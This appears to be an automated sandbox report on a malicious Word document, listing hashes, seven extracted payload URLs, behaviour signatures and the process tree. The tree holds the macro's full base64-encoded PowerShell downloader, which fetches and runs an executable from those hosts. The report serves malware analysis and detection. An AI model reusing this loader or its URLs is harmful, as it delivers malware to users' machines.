Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
06/09/2024, 15:24
General
-
Target
cfd80cc80e9400b3c1b75c5be4d69606_JaffaCakes118.doc
-
Size
224KB
-
MD5
cfd80cc80e9400b3c1b75c5be4d69606
-
SHA1
31f6a2ee43be899aef50f1f5903e8c95e22daa73
-
SHA256
206dc1c940e5109e2e121fc275c21edbf294ddc5c4d14fbda80d08b35dce5053
-
SHA512
b829cb96c5f9b670a85f79827af50798ae8aa152b5eeada947330f0e0beb6ae56a536e6f6772f8d0d3a00fdb4e6edc54e6bd05bac8967bdf6d085adde808292f
-
SSDEEP
3072:lV4PrXcuQuvpzm4bkiaMQgAlSsF62ezg2n2:cDRv1m4bnQgISsF6Lg2n2
Malware Config
Extracted
http://wynn838.com/wp-content/B/
https://menuazores.com/root/4eq/
https://www.lunalysis.com/images/P/
https://fedo.xyz/wp-admin/AaD/
http://themsc.net/cctqv/M/
http://earthinnovation.org/pcimonitor/d/
http://pastaciyiz.biz/wp-includes/1/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 7 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cfd80cc80e9400b3c1b75c5be4d69606_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -en JABOAHoAaABzADIAegB5AD0AKAAoACcAVgB3ACcAKwAnAGoAdwB6ACcAKQArACcAYQB6ACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUAbgB2ADoAVQBTAEUAcgBQAHIAbwBmAEkAbABlAFwAYQA0AHYAZwBFADYAUwBcAHgAMQBpAFkAawBYAHMAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAFIAZQBjAFQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAVQByAGkAYABUAHkAUABgAFIAbwBUAGAATwBDAG8ATAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAJwApACsAKAAnADIALAAgAHQAJwArACcAbAAnACkAKwAoACcAcwAnACsAJwAxADEALAAnACkAKwAnACAAJwArACgAJwB0ACcAKwAnAGwAcwAnACkAKQA7ACQASABxADEAcgA1ADIAegAgAD0AIAAoACgAJwBEAGcAJwArACcAbAB4ACcAKQArACgAJwBqAG4AJwArACcAawAnACkAKwAnAGEAOQAnACkAOwAkAFcAZwBiAGIANgB5ADAAPQAoACgAJwBZAGYAJwArACcAdQAnACkAKwAoACcAaAB2ACcAKwAnAGwAZQAnACkAKQA7ACQAVwBwADkAMwA3AGsAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwB7ADAAfQAnACsAKAAnAEEAJwArACcANAB2ACcAKQArACcAZwBlADYAcwB7ADAAJwArACcAfQAnACsAJwBYADEAJwArACcAaQAnACsAKAAnAHkAawAnACsAJwB4ACcAKQArACcAcwB7ADAAfQAnACkAIAAgAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQASABxADEAcgA1ADIAegArACgAJwAuAGUAJwArACcAeABlACcAKQA7ACQASgBzAHYANwBuADgAYQA9ACgAJwBOAGQAJwArACcAbQAnACsAKAAnADcAJwArACcAeQBmAG8AJwApACkAOwAkAFQAYgBjAGIAOQB5AHIAPQAmACgAJwBuAGUAJwArACcAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4ARQB0AC4AVwBFAEIAYwBMAGkARQBOAHQAOwAkAEQAdAAyAHUAYwBvAHIAPQAoACgAJwBoAHQAJwArACcAdABwADoAJwApACsAKAAnAC8ALwB3ACcAKwAnAHkAJwApACsAKAAnAG4AbgA4ACcAKwAnADMAOAAnACsAJwAuAGMAbwAnACsAJwBtAC8AdwBwACcAKwAnAC0AJwApACsAJwBjACcAKwAoACcAbwAnACsAJwBuAHQAZQBuACcAKQArACgAJwB0AC8AQgAvACcAKwAnACoAJwArACcAaAAnACsAJwB0AHQAcABzADoALwAnACsAJwAvAG0AJwApACsAKAAnAGUAbgB1AGEAJwArACcAegBvACcAKwAnAHIAJwApACsAJwBlAHMAJwArACgAJwAuAGMAbwAnACsAJwBtACcAKQArACgAJwAvAHIAJwArACcAbwAnACkAKwAoACcAbwB0ACcAKwAnAC8ANABlAHEALwAqAGgAdAAnACsAJwB0ACcAKwAnAHAAJwArACcAcwA6ACcAKQArACcALwAvACcAKwAnAHcAJwArACgAJwB3ACcAKwAnAHcALgBsAHUAbgBhACcAKwAnAGwAJwApACsAKAAnAHkAcwBpAHMALgAnACsAJwBjAG8AbQAvAGkAbQBhAGcAZQAnACsAJwBzACcAKQArACgAJwAvACcAKwAnAFAALwAqACcAKQArACgAJwBoAHQAJwArACcAdAAnACkAKwAnAHAAcwAnACsAKAAnADoAJwArACcALwAvACcAKQArACgAJwBmAGUAJwArACcAZABvAC4AJwApACsAJwB4ACcAKwAnAHkAJwArACgAJwB6AC8AJwArACcAdwAnACkAKwAnAHAAJwArACgAJwAtAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4ALwBBAGEAJwArACcARAAvACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAJwArACcAOgAvACcAKQArACgAJwAvAHQAaAAnACsAJwBlAG0AJwArACcAcwAnACsAJwBjAC4AbgBlACcAKQArACcAdAAnACsAKAAnAC8AYwBjAHQAJwArACcAcQB2ACcAKQArACgAJwAvAE0ALwAqAGgAdAB0AHAAOgAvACcAKwAnAC8AZQAnACsAJwBhACcAKQArACgAJwByAHQAJwArACcAaABpAG4AJwArACcAbgBvAHYAYQB0ACcAKQArACcAaQAnACsAKAAnAG8AbgAuAG8AcgBnACcAKwAnAC8AcAAnACkAKwAoACcAYwBpACcAKwAnAG0AbwBuACcAKQArACcAaQB0ACcAKwAoACcAbwByAC8AZAAvACcAKwAnACoAaAAnACkAKwAoACcAdAAnACsAJwB0AHAAOgAnACsAJwAvAC8AcABhAHMAdABhACcAKQArACgAJwBjAGkAJwArACcAeQBpAHoALgAnACkAKwAoACcAYgBpACcAKwAnAHoALwB3ACcAKwAnAHAALQBpAG4AYwBsAHUAZAAnACsAJwBlACcAKQArACgAJwBzAC8AMQAnACsAJwAvACcAKQApAC4AIgBzAGAAUABsAEkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAE8ANgA2AHMANAA0ADMAPQAoACcAUgA4ACcAKwAoACcAYwB1AHAAMAAnACsAJwB3ACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAUwA2AHIAbABwADUAdQAgAGkAbgAgACQARAB0ADIAdQBjAG8AcgApAHsAdAByAHkAewAkAFQAYgBjAGIAOQB5AHIALgAiAEQAbwBXAE4AbABPAGAAQQBkAGAARgBJAGwAZQAiACgAJABTADYAcgBsAHAANQB1ACwAIAAkAFcAcAA5ADMANwBrAHoAKQA7ACQATgB1AGEANABwAGIAcwA9ACgAJwBFACcAKwAoACcANAB0ADIAJwArACcAbQBjAGUAJwApACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQAVwBwADkAMwA3AGsAegApAC4AIgBMAGAAZQBOAEcAdABoACIAIAAtAGcAZQAgADMANgAxADMANQApACAAewAuACgAJwBJAG4AdgBvAGsAZQAnACsAJwAtACcAKwAnAEkAdABlACcAKwAnAG0AJwApACgAJABXAHAAOQAzADcAawB6ACkAOwAkAEoAeAAxAHIAdwA4AHUAPQAoACgAJwBaAGkAcgA1AHIAJwArACcANQAnACkAKwAnAHUAJwApADsAYgByAGUAYQBrADsAJABKAG0AZQBlAHYAMgB0AD0AKAAoACcAVwAnACsAJwBtAGEAawBiACcAKwAnAGoAJwApACsAJwB2ACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwAzAGIAbQA4AHMAOAA9ACgAKAAnAE0AZABxACcAKwAnADUAJwApACsAKAAnAGEAJwArACcAZQB6ACcAKQApAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
16B
MD5d29962abc88624befc0135579ae485ec
SHA1e40a6458296ec6a2427bcb280572d023a9862b31
SHA256a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA5124311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f
-
Filesize
1KB
MD5cfbcaa168a14da576efbcfdad8dae5e2
SHA1982379432ae96617ca045c4a13b776b990f3b7dd
SHA256485ee2d1bdb5fe3322a7f026f2f2a672153888a9e0d387af5a9174c5c2ae2c45
SHA512a681e1c577565e077b1590a02b3b21d922aa4e555241a9057abdeb4208b892a6d44baf53eecea9e65eda55e40fc2f9ee97dd563190c7fa5292496a5240e70d8f
-
Filesize
106KB
MD52ba0c56e435a89b37b6c943c1ead4c9e
SHA1ea889d10e5e6c09ce58ed12a09aec8a5d2a45324
SHA2567133912ee461591c6b98c036c61de56ba51472720842805e6ec21b80bd5d0278
SHA512c4b8ce0fe93a4f8de19b4ffb6cbb9a25e907b6bf84c11ed5e7c9aa9ff05132b31ea7e1307680ac418a944623f9d8bd117aeb0d33901e92de810bc24e20dc3e2b
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
136KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB